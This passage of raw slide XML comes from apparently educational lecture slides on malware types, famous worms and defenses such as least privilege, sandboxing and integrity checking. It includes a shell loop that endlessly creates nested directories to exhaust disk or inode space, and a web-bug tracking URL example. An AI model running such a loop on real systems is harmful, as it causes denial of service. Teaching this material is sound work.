                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1863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24">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1862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2407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600" spc="-4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ecutable code and data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8624">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="18638">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="18638">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1863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1202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Malicious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Software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Defined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840740" marR="1184275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“Executable instructions that cause security policy to be violated.”</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>–Matt</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200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i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Bishop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300"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="75"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1300"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="840740" marR="508000" indent="0">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3200" i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>“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200" spc="-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program that is inserted into a system, usually covertl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-21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, with the intent of compromising the confidentialit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-21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, integrit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-21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, or availability of the victim</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" spc="-18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data, applications, or operating system or otherwise annoying or disrupting the victim.” </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>– N</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3200" i="1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3200" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>ST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2130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Multipartite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56210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virus that can infect either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boot sectors or executables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ypicall</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-20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two parts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One part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boot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sector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infector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Othe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executabl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infector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Stealth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virus that conceals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infection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files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928369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IDF virus modifies a service interrupt handler as follows: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Request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file length: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return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length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uninfected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>
                        <a:lnSpc>
                          <a:spcPts val="3025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file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</a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="57721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Request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open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temporarily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disinfect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 re-infect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closing;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defeats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virus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scanners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that open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 read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06045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Reques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loa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execution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infected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57705" y="4774691"/>
            <a:ext cx="1790700" cy="693420"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1790700" h="693420">
                <a:moveTo>
                  <a:pt x="1790700" y="693420"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1790700" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="693420"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1790700" y="693420"/>
                </a:lnTo>
                <a:close/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68567" y="4765547"/>
            <a:ext cx="2252472" cy="693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21040" y="4765547"/>
            <a:ext cx="211835" cy="693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48066" y="5516117"/>
            <a:ext cx="249935" cy="134874"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="249935" h="134874">
                <a:moveTo>
                  <a:pt x="38100" y="77724"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="19812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="249936" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="134874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="77724"/>
                </a:lnTo>
                <a:close/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48066" y="5516117"/>
            <a:ext cx="249935" cy="134874"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="249935" h="134874">
                <a:moveTo>
                  <a:pt x="249936" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="19812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38100" y="77724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="134874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2499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90154" y="5593841"/>
            <a:ext cx="76961" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="76961" h="38100">
                <a:moveTo>
                  <a:pt x="76961" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="38100"/>
                </a:lnTo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66573" y="5053753"/>
            <a:ext cx="75658" cy="75078"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="75658" h="75078">
                <a:moveTo>
                  <a:pt x="75658" y="37930"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="73023" y="24080"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65759" y="12383"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54822" y="3977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41171" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26021" y="2392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13618" y="9136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4699" y="19239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31709"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2026" y="47690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8201" y="60578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17617" y="69874"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29366" y="75078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46221" y="73382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59487" y="67664"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68943" y="58778"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74367" y="47579"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75658" y="379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04894" y="4996434"/>
            <a:ext cx="173736" cy="192786"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="173736" h="192786">
                <a:moveTo>
                  <a:pt x="0" y="96012"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173736" y="96012"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96012"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="1925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104894" y="4996434"/>
            <a:ext cx="173736" cy="192786"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="173736" h="192786">
                <a:moveTo>
                  <a:pt x="173736" y="96012"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173736" y="9601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12235" y="5054346"/>
            <a:ext cx="0" cy="76962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="76962">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76962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31285" y="5054346"/>
            <a:ext cx="712470" cy="76962"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="712470" h="76962">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="76962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712470" y="76962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="712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29152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Encrypted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1106805" marR="19716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617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virus that is enciphered except for a small deciphering routine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678305" marR="790575" lvl="1" indent="-4572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7767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Detecting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virus by signature is now much harder as most of virus is enciphered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678305" lvl="1" indent="-4572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77670" algn="l"/>
                          <a:tab pos="650494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The key does not need to be kept secret.	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hy?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9"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="5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1363345">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="1800" spc="-254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irus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code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200"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="44"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1200"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="602234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Deciphering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95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1800" spc="-204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y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4528083" y="4765065"/>
          <a:ext cx="4033189" cy="7126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0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2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marL="404495" marR="222885" indent="-250190">
                        <a:lnSpc>
                          <a:spcPct val="7030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Deciphering routine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253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1925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Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Enciphered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virus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0" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>code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253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="1925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253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnL>
                    <a:lnR w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                    <a:lnT w="19253">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnT>
                    <a:lnB w="19253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968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Polymorphic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20775" marR="137541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virus that changes its form each time it inserts itself into another program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120775" marR="966469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Idea is to prevent signature detection by changing the “signature” or instructions used for deciphering routine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120775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At instruction level: substitute instructions.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120775" marR="108648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At algorithm level: di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ferent algorithms to achieve the same purpose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120775" marR="157035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1120775" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2700" spc="-19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oolkits exist to make these (Mutation Engine, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="27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rident Polymorphic Engine)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4970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These are di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ferent instructions (with di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ferent bit patterns) but have the same e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fect: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add 0 to register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subtract 0 from register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xor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0 with register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no-op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4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9048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Polymorphic virus would pick randomly from among these instructions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Macro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iruses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0106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virus composed of a sequence of instructions that are interpreted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rather than executed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directly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infect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either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executables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or data files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Independent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machine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architecture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But their e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fects may be machine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dependent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MS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3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ord, Excel,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etc.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1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can carry</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3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 macros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Consider the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3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indows Metafile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exploit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90850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Compute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rms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36080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program that copies itself from one computer to another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Origins: distributed computations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Segment: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part of program copied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onto workstation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42684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Segmen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processe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data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communicate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worm</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-13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 controller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Any activity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on workstation caused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segment to shut down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7068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Example: Internet </a:t>
                      </a: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orm of 1988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Robert Morris, Cornell graduate student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56959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Used virus-like attack to inject instructions into running programs and run them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3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68389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19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o recove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one had to disconnect system from Internet and reboot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58356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19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o prevent re-infection, several critical programs had to be patched, recompiled, and reinstalled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Analysts had to disassemble it to uncover function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Disabled several thousand systems in 6 or so hours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990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Example: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Code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Red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5619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Infected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Microsoft IIS through a bu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fer overflow exploit.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marR="82359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Probed other systems on “nearby”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IP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-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addresses looking for other servers to infect.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First version defaced</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3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sites.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Launched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DDOS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 whitehouse.gov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marR="4152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Subsequent versions included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copy of IE and opened back doors into the system.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Mobile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Code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34366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Programs that can be shipped unchanged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a variety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platforms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12973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ransmitted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from a remote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to a local system and then executed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 the local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918844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Often acts as a mechanism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a virus, worm, or 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horse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99441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akes advantage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vulnerabilities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perform it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ow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exploits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58737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popular vehicles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include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Java applets, Flash, PD</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-2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ActiveX, JavaScript and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VBScript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965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What?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Me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worry?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0242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Modern computing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systems are quite complex.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024255" marR="10020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 operate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 human speed; it is impossible to know everything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that goes on.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024255" marR="176847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spc="-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setup or install program for a software package.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0242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2425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Malicious code can do substantial harm.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4701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Drive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By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Downloads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289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Exploits browser vulnerabilities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download and install malware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 the system when the user views a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="30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page controlled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the attacker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 most cases does not actively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propagate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Spreads when users visit the malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3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page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403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Rabbits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Bacteria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1376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program that absorbs all of some class of resources by “multiplying” rapidl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-17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hence the name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8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for UNIX system, shell commands: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993140" marR="6299200">
                        <a:lnSpc>
                          <a:spcPts val="3170"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="30"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>whil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0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2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> true do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 marL="1450340" marR="6389370">
                        <a:lnSpc>
                          <a:spcPts val="3170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>mkdi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5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0" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>x </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>chdi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5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0" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>x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 marL="99314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1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>done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8"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="800"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="152336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Exhausts either disk space or file allocation table (inode) space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Logi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Bombs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845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program that performs an action that violates the site security policy when some external event occurs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077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program that deletes all of a company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s payroll records when one particular record is deleted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60896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“particula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record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usuall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perso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writing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the logic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bomb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893444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Ide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(when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fired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payrol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record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deleted,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the company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loses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those records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Ransomware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7955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Malicious software that encrypts data on the victim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 system using public key crypto.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98755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ill provide the private key necessary to recover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 data… for a fee.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502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fee is generally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demanded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Bitcoin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or other untraceable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mechanism.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4522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Propagation is similar to other malicious software: phishing, drive-by downloads, etc.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eb Bugs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612140">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3000" spc="-21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 kinds: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</a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="955040" marR="8051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2900" spc="-23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pages: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cause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hard-to-spot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="29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download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from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a third-party</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="29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-23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server;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server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now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set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a cookie.</a:t>
                      </a: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955040" marR="331470" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="98700"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="955040" algn="l"/>
                          <a:tab pos="2470785" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2900" spc="-5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UR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9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contain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cod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uniqu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the message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.	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sende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ca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determin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900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t> message </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>was opened. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="20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  <a:hlinkClick r:id="rId3"/>
                        </a:rPr>
                        <a:t>http://www.exploits.com/pixel.gif?bbrown@spsu.edu</a:t>
                      </a:r>
                      <a:endParaRPr sz="20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13"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="1100"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="9550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latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>168.28.180.3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="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2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t> [30/Jan/2010:15:02:19]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 marL="9550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latin typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                        </a:rPr>
                        <a:t>"GET/images/pixel.gif?bbrown@spsu.edu</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New"/>
                        <a:cs typeface="Courier Ne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7083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Social Engineering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Spam, phishing and spea</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-6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-phishing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9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rojan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orse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8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74485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Ofte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“free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program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lik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games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malicious additions.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6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88404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Drive-by download:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-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web site installs or attempts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install malicious software.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Platforms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Desktops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Mobil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increasing)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Rootkits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058545" marR="81280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Set of hidden programs installed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 a system to maintain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covert access to that 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0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058545" marR="101536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Hides by subverting the mechanisms that monitor and report on the processes, files, and registries on a computer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49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058545" marR="1669414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Gives administrator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(or root) privileges to attacker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49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058545" marR="75565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1058545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add or change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programs and files, monitor processes, send and receive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 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fic, and get backdoor access on demand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Defenses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Distinguish between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data, instructions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1074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3000" i="1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Microsoft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Data Execution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Prevention)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</a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1107440" marR="14706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Limit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objects accessible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processes (least privilege)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Inhibit sharing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Detect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alteration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files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Detect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actions beyond specifications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Analyze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statistical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characteristics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7146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Data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vs.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Instructions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Malicious logic is both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2138680" lvl="1" indent="-28575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14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irus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writte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progra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(data)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;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executes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(instructions)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4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979169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Approach: treat “data” and “instructions” as separate types, and require certifying authority to approve conversion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8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583565" lvl="1" indent="-28575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assumptio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certifyin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authorit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wil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0" dirty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2400" i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make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mistake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assumptio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tools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supporting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infrastructure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used in certifying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process are not corrupt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1"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="650"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1230630" indent="-34290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Example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Microsoft</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2800" spc="-15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Dat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Executio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revention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(DEP)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45427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Example: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Duff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Unix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77228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Files with “execute”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permission have type “executable”;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those without it, type “data”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79197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Executable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files can be altered,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but type is immediately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changed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“data”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Implemented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turning o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 execute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permission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Certifier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can change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them back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324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 virus can spread only if run as certifier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183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Classification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Malware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 broad categories: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malwar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propagate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(spreads)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Payloa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does)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Secondary classifications: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Independent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requiring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Replicatin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non-replicating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6371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Limiting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Accessibility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6329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Basis: a user (unknowingly) executes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malicious logic, which then executes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ith all that use</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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-16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 privileges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118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This is one reason why one should not normally with an account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ith administrative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privileges.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5956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Limiting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accessibility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objects should limit spread of malicious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logic and e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fects of its actions (least privilege)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08036" y="4135373"/>
            <a:ext cx="40978" cy="38100"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="40978" h="38100">
                <a:moveTo>
                  <a:pt x="40978" y="17243"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34934" y="4949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22009" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15943" y="260"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4691" y="6925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6338" y="33150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18961" y="38100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25212" y="37840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36533" y="31176"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40978" y="17243"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="40978" h="38100">
                <a:moveTo>
                  <a:pt x="22009" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18961" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18961" y="130"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22009" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="40978" h="38100">
                <a:moveTo>
                  <a:pt x="22009" y="38100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18961" y="38099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22009" y="3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986914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Reducing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Protection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Domain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Application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principle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least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4198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Basic idea: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remove rights from a process so it can only perform its function (and nothing else)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8391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arning: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if that function requires it to write to some object,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it can write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anything</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1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that object.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3633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But you can make sure it writes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" i="1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3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those objects you expect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2768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Role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16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ust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0706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rust the user to take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explicit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actions to limit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their process’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-2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protection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domain su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ficiently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is, enforce least privilege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correctly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622935" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="288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rust mechanisms to describe programs’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-2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expected actions su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ficiently for descriptions to be applied, and to handle commands without such descriptions properly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rust specific programs and kernel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394460" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="288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Problem: these are usually the first programs malicious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logic attack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56210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Sandboxing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irtual</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="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Machines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471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Sandboxes and virtual machines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also restrict rights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53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Consider running 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browser inside a virtual machine.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5924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Modify program by inserting instructions to cause traps when violation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policy is attempted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400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Replace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dynamic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load libraries with instrumented routines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5712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Detect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Alteration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 Files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670560" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="27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500" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Compute a manipulation detection code (MDC) to generate a signature block for each file, and save it (It</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2500" spc="-14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5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a cryptographic hash)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6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72136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500" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Late</a:t>
                      </a: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, recompute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="25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the MDC</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="25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and compare to stored MDC.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="25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If di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ferent, file has changed.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54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500" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Example: tripwire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27710" lvl="1" indent="-286385">
                        <a:lnSpc>
                          <a:spcPts val="28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Signature consists of file attributes, cryptographic checksums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hosen from among MD4, MD5, H</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2600" spc="-335" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>AV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AL, SHS, CRC-16, CRC-32, etc.)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42"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="750"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1079500" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="27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5" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>Assumption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: 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Files do not contain malicious</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="25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0" dirty="0">
                          <a:latin typeface="Times New Roman"/>
                          <a:cs typeface="Times New Roman"/>
                        </a:rPr>
                        <a:t>logic when original signature block generated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1940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Antivirus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Programs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524000" indent="-342900" algn="just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Look for specific sequences of bytes (called “virus signature” in file; if found, warn user and/or disinfect file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agent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looks for known set of viruses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8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06045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Signature-based</a:t>
                      </a:r>
                      <a:r>
